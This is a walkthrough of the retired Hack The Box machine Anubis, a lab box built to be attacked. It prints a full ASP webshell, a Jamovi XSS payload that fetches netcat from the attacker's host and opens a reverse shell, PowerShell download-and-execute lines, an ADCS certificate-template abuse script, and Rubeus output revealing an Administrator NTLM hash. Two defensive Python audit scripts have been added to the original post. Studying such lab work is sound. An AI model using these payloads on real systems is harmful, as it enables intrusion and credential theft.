Anubis: Hack The Box Walkthrough

 2 years ago
source link: https://hackso.me/anubis-htb-walkthrough/
This post documents the complete walkthrough of Anubis, a retired vulnerable VM created by 4ndr34z, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

Background

Anubis is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.11.102 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-16 03:46:36 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 593/tcp on 10.10.11.102
Discovered open port 443/tcp on 10.10.11.102
Discovered open port 49727/tcp on 10.10.11.102
Discovered open port 445/tcp on 10.10.11.102
Discovered open port 135/tcp on 10.10.11.102

Not much going on. Let’s do one better with nmap scanning the discovered ports to establish their services.

nmap -n -v -Pn -p135,443,445,49727 -A --reason 10.10.11.102 -oN nmap.txt
...
PORT    STATE SERVICE       REASON          VERSION
135/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
443/tcp open  ssl/http      syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=www.windcorp.htb
| Subject Alternative Name: DNS:www.windcorp.htb
| Issuer: commonName=www.windcorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-24T19:44:56
| Not valid after:  2031-05-24T19:54:56
| MD5:   e2e7 86ef 4095 9908 14c5 3347 cdcb 4167
|_SHA-1: 7fce 781f 883c a27e 1154 4502 1686 ee65 7551 0e2a
|_ssl-date: 2021-08-16T04:07:24+00:00; 0s from scanner time.
| tls-alpn:
|_  http/1.1
445/tcp open  microsoft-ds? syn-ack ttl 127
593/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0

I’d better map www.windcorp.htb to 10.10.11.102 in /etc/hosts. This is what the site looks like.

Directory/File Enumeration

Let’s see what we can glean from gobuster and SecLists.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -e -k -t 20 -x asp,txt -u https://www.windcorp.htb/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://www.windcorp.htb/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              asp,txt
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/08/16 05:59:06 Starting gobuster in directory enumeration mode
===============================================================
https://www.windcorp.htb/test.asp             (Status: 200) [Size: 518]
https://www.windcorp.htb/assets               (Status: 301) [Size: 155] [--> https://www.windcorp.htb/assets/]
https://www.windcorp.htb/forms                (Status: 301) [Size: 154] [--> https://www.windcorp.htb/forms/]
https://www.windcorp.htb/services.asp         (Status: 200) [Size: 21596]
https://www.windcorp.htb/preview.asp          (Status: 200) [Size: 3803]
https://www.windcorp.htb/save.asp             (Status: 302) [Size: 157] [--> https://www.windcorp.htb/preview.asp]
https://www.windcorp.htb/readme.txt           (Status: 200) [Size: 215]
https://www.windcorp.htb/changelog.txt        (Status: 200) [Size: 1386]

===============================================================
2021/08/16 05:59:42 Finished
===============================================================

Contact

Interestingly, there’s a contact form that refers to save.asp. Suppose we send a message like so.

We see this in test.asp.

Looks like we are able to execute VBScript.

ASP Webshell

Kali Linux has just the right ASP webshell for the job.

/usr/share/webshells/asp/cmdasp.asp
<%
  Dim oScript
  Dim oScriptNet
  Dim oFileSys, oFile
  Dim szCMD, szTempFile

  On Error Resume Next

  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

  szCMD = Request.Form(".CMD")
  If (szCMD <> "") Then
    szTempFile = "C:\" & oFileSys.GetTempName( )
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
  End If

%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
  If (IsObject(oFile)) Then
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
  End If
%>

When we send the above in a message to save.asp, we get this in test.asp.

Whoa, it can’t be this easy, right?

Windows Server Container

I think we are inside a Windows Server Container.

Foothold

Let’s download a copy of nc64.exe and save it as C:\temp\cute.exe.

And run a reverse shell back to us.

A reverse shell appears in our netcat

Breaking Out of a Windows Container

During enumeration of the container, I was lucky to find ConsoleHost_history.txt where the creator(s) were kind enough to leave clues on how to proceed.

Enter PowerProxy—A SOCKS proxy with reverse proxy capabilities. With PowerProxy, I’m able to set up a SOCKS4 proxy in the container, allowing me to port-scan hosts in the same network as the container that are otherwise not accessible to me. Recall that the container’s IP address is 172.21.132.45 and the gateway’s IP address is 172.21.128.1. Normally the gateway is the host.

Run this on your machine.

python3 reverse_proxy_handler.py -p 8080

Run this in the container.

start powershell -c "Import-Module \temp\PowerProxy.ps1; Start-ReverseSocksProxy 10.10.14.64 -Port 8080"

Let’s scan ports commonly found in Windows.

proxychains -q nmap -sT -T4 -n -Pn 172.21.128.1 -p80,443,445,5985 --open 2>/dev/null
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-09 15:30 UTC
Nmap scan report for 172.21.128.1
Host is up (0.028s latency).
Not shown: 1 closed port
PORT     STATE SERVICE
80/tcp   open  http
445/tcp  open  microsoft-ds
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds

This is what 80/tcp looks like.

Software Portal

The software offering looks interesting. The URL to 7-zip looks like this.

http://softwareportal.windcorp.htb/install.asp?client=172.21.129.14&software=7z1900-x64.exe

What if I change the client IP address to my own and fire tcpdump with the following filter to see what type of traffic comes in?

Interesting. The software portal is trying to connect to WinRM on my machine. Let’s give it what it wants. The latest version of Responder now offers a rogue WinRM server to capture NTLMv2 hashes.

Awesome. Let’s run the hash through JtR and see what we have.

We have a set of credentials (windcorp\localadmin:Secret123).

SMB Enumeration

Let’s see what we can glean with these credentials.

Especially what’s in Shared.

CVE-2021-28079 - Jamovi <= 1.16.18 Cross-Site Scripting Vulnerability

It’s no wonder: the creator of this box is one of the people who discovered this vulnerability. The column name is vulnerable to XSS in the ElectronJS framework. An attacker can craft an .OMV document containing a payload.

Notice the last-modification date of Whatif.omv in Shared\Documents\Analytics above is more current than the rest of the .OMV files? I suspect there’s a scheduled task that opens Whatif.omv with a vulnerable Jamovi at some point in time.

Taking a leaf from the POC video, we can change the column-name to the following XSS payload in metadata.json

The XSS payload will fetch jamovi.js from Python’s http.server and hopefully Jamovi will execute the JS. This is what jamovi.js looks like.

jamovi.js
const p = require("child_process");
p.exec("powershell -c iwr http://10.10.14.64:8000/nc64.exe -outf \\windows\\system32\\spool\\drivers\\color\\cute.exe");
p.exec("start \\windows\\system32\\spool\\drivers\\color\\cute.exe 10.10.14.64 4321 -e cmd.exe");

I’ve chosen to download nc64.exe from Python’s http.server and save it to a Windows world-writable folder as cute.exe and then use it to run a reverse shell back to me.
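
A defensive check for a share like this one, as an added example that is not part of the original post: an .omv file is a zip archive, so the column names in its metadata.json can be inspected for markup before anyone opens the file. The dataSet/fields/name layout and both sample archives are constructed assumptions; the scanner walks every "name" key so it does not depend on the exact schema.

```python
import io
import json
import re
import zipfile

# Markup that has no business in a column name: tags, event handlers, script URLs.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=|javascript:", re.I)


def column_names(node):
    """Yield every string stored under a "name" key anywhere in the JSON tree."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "name" and isinstance(value, str):
                yield value
            else:
                yield from column_names(value)
    elif isinstance(node, list):
        for item in node:
            yield from column_names(item)


def scan_omv(blob):
    """Return the column names in an .omv archive that contain HTML/JS markup."""
    with zipfile.ZipFile(io.BytesIO(blob)) as archive:
        if "metadata.json" not in archive.namelist():
            return []
        meta = json.loads(archive.read("metadata.json"))
    return [name for name in column_names(meta) if MARKUP.search(name)]


def make_omv(names):
    """Build a constructed, minimal .omv-like archive in memory for the demo."""
    meta = {"dataSet": {"fields": [{"name": n, "dataType": "Decimal"} for n in names]}}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("metadata.json", json.dumps(meta))
    return buf.getvalue()


# Constructed samples: ordinary column names vs. one carrying a harmless marker tag.
CLEAN = make_omv(["Sepal.Length", "Sepal.Width", "x < 5"])
TAMPERED = make_omv(["Sepal.Length", "<script>/* constructed marker */</script>"])

if __name__ == "__main__":
    print("clean   :", scan_omv(CLEAN))
    print("tampered:", scan_omv(TAMPERED))
```

Running the same function over every .omv in a writable share, and alerting on files whose modification time is newer than their siblings, covers the situation described above.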

The file user.txt is in diegocruz’s Desktop.

Privilege Escalation

During enumeration of diegocruz’s account, I notice that Active Directory Certificate Services (ADCS) is installed.

Certified Pre-Owned

Read this post for details on attacking misconfigured ADCS. Note that the building of Certify and Rubeus in Visual Studio is beyond the scope of this write-up.

Now check this out with Certify.exe find.

The domain group WINDCORP\webdevelopers has full control over the Web Certificate Template. And guess what—diegocruz is the only member in the group.

Here’s the game plan.

  1. Reconfigure the Web template to issue certificate for Smartcard Logon
  2. Enroll Administrator to get a certificate for Smartcard Logon
  3. Use Rubeus to obtain TGT for Administrator and reveal NTLM hash
  4. Profit!

Step 1 - Reconfigure Web template

Step 1 can be easily completed with the help of PoshADCS cmdlet Set-ADCSTemplate.

IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.64/PowerView.ps1")
IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.64/ADCS.ps1")
IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.64/Reconfigure-Template.ps1")

Where Reconfigure-Template.ps1 is

Reconfigure-Template.ps1
$Properties = @{}
$Properties.Add('mspki-certificate-name-flag',1)
$Properties.Add('pkiextendedkeyusage',@('1.3.6.1.4.1.311.20.2.2','1.3.6.1.5.5.7.3.2'))
$Properties.Add('msPKI-Certificate-Application-Policy',@('1.3.6.1.4.1.311.20.2.2','1.3.6.1.5.5.7.3.2'))
$Properties.Add('flags','CLEAR')
$Properties.Add('mspki-enrollment-flag',0)
$Properties.Add('mspki-private-key-flag',256)
$Properties.Add('pkidefaultkeyspec',1)

Set-ADCSTemplate -Name Web -Properties $Properties -Force

After adding Smartcard Logon to Web certificate template this is what it looks like.
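
From the defender's side, the same attributes can be audited. The Python below is an added example (not from the original write-up, Certify or PoshADCS) that checks a template record for the combination Step 1 creates: a requester-supplied subject, an EKU that allows logon, and no approval step, plus write access held by a non-admin group. The flag bits and OIDs are the documented values; the `writers` field, `TRUSTED_WRITERS` and the "before" snapshot are constructed assumptions.

```python
ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag (CA manager approval)

# EKU OIDs that let the holder authenticate to the domain with the certificate.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}
# Assumption: the only principals that should be able to edit templates.
TRUSTED_WRITERS = {"Domain Admins", "Enterprise Admins", "SYSTEM"}
WATCHED = ("msPKI-Certificate-Name-Flag", "msPKI-Enrollment-Flag",
           "msPKI-RA-Signature", "pKIExtendedKeyUsage")


def audit_template(t):
    """Return findings for one template record (dict of LDAP attribute values)."""
    findings = []
    ekus = set(t.get("pKIExtendedKeyUsage", []))
    if ekus:
        auth = sorted(AUTH_EKUS[oid] for oid in ekus & set(AUTH_EKUS))
    else:
        auth = ["no EKU, usable for any purpose"]
    supplies_subject = t.get("msPKI-Certificate-Name-Flag", 0) & ENROLLEE_SUPPLIES_SUBJECT
    approval = t.get("msPKI-Enrollment-Flag", 0) & PEND_ALL_REQUESTS
    signatures = t.get("msPKI-RA-Signature", 0)
    if supplies_subject and auth and not approval and not signatures:
        findings.append("requester sets the subject, EKU allows logon (%s), "
                        "no approval step" % ", ".join(auth))
    outsiders = sorted(set(t.get("writers", [])) - TRUSTED_WRITERS)
    if outsiders:
        findings.append("writable by " + ", ".join(outsiders))
    return findings


def changed_attributes(before, after):
    """Names of security-relevant attributes whose values differ between snapshots."""
    return [a for a in WATCHED if before.get(a) != after.get(a)]


# Constructed snapshot of a web-server template before the change (not from the page).
WEB_BEFORE = {
    "msPKI-Certificate-Name-Flag": 1, "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
    "writers": ["Domain Admins", "webdevelopers"],  # stand-in for the template ACL
}
# Same template with the EKU list that Reconfigure-Template.ps1 writes.
WEB_AFTER = dict(WEB_BEFORE, **{
    "pKIExtendedKeyUsage": ["1.3.6.1.4.1.311.20.2.2", "1.3.6.1.5.5.7.3.2"]})

if __name__ == "__main__":
    for label, snap in (("before", WEB_BEFORE), ("after", WEB_AFTER)):
        print(label, audit_template(snap))
    print("changed:", changed_attributes(WEB_BEFORE, WEB_AFTER))
```

The "before" snapshot already reports the writable ACL, which is the root cause here: removing the group's write access prevents the EKU change that turns the template into a logon credential source.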

Step 2 - Enroll Administrator to get a certificate for Smartcard Logon

Certify has a nifty feature for this step.

.\Certify.exe request /ca:earth.windcorp.htb\windcorp-CA /template:Web /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : WINDCORP\diegocruz
[*] No subject name specified, using current context as subject.

[*] Template                : Web
[*] Subject                 : CN=Diego Cruz, OU=MainOffice, DC=windcorp, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : earth.windcorp.htb\windcorp-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 3

[*] cert.pem         :

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:17.0611875

Step 3 - Use Rubeus to reveal Administrator’s NTLM hash

.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:password123 /getcredentials

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Diego Cruz, OU=MainOffice, DC=windcorp, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'windcorp.htb\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

  ServiceName              :  krbtgt/windcorp.htb
  ServiceRealm             :  WINDCORP.HTB
  UserName                 :  Administrator
  UserRealm                :  WINDCORP.HTB
  StartTime                :  10/11/2021 5:13:00 AM
  EndTime                  :  10/11/2021 3:13:00 PM
  RenewTill                :  10/18/2021 5:13:00 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  oXPCzp1oL6+KG8FaJJO/Nw==
  ASREP (key)              :  C9671F60EF5739FCCDDA8E0269D003D4

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 3CCC18280610C6CA3156F995B5899E09

Step 4 - Profit!

Armed with Administrator’s NTLM hash, all we need to do is to use Impacket’s psexec.py to get us a shell.

Getting root.txt is a breeze.
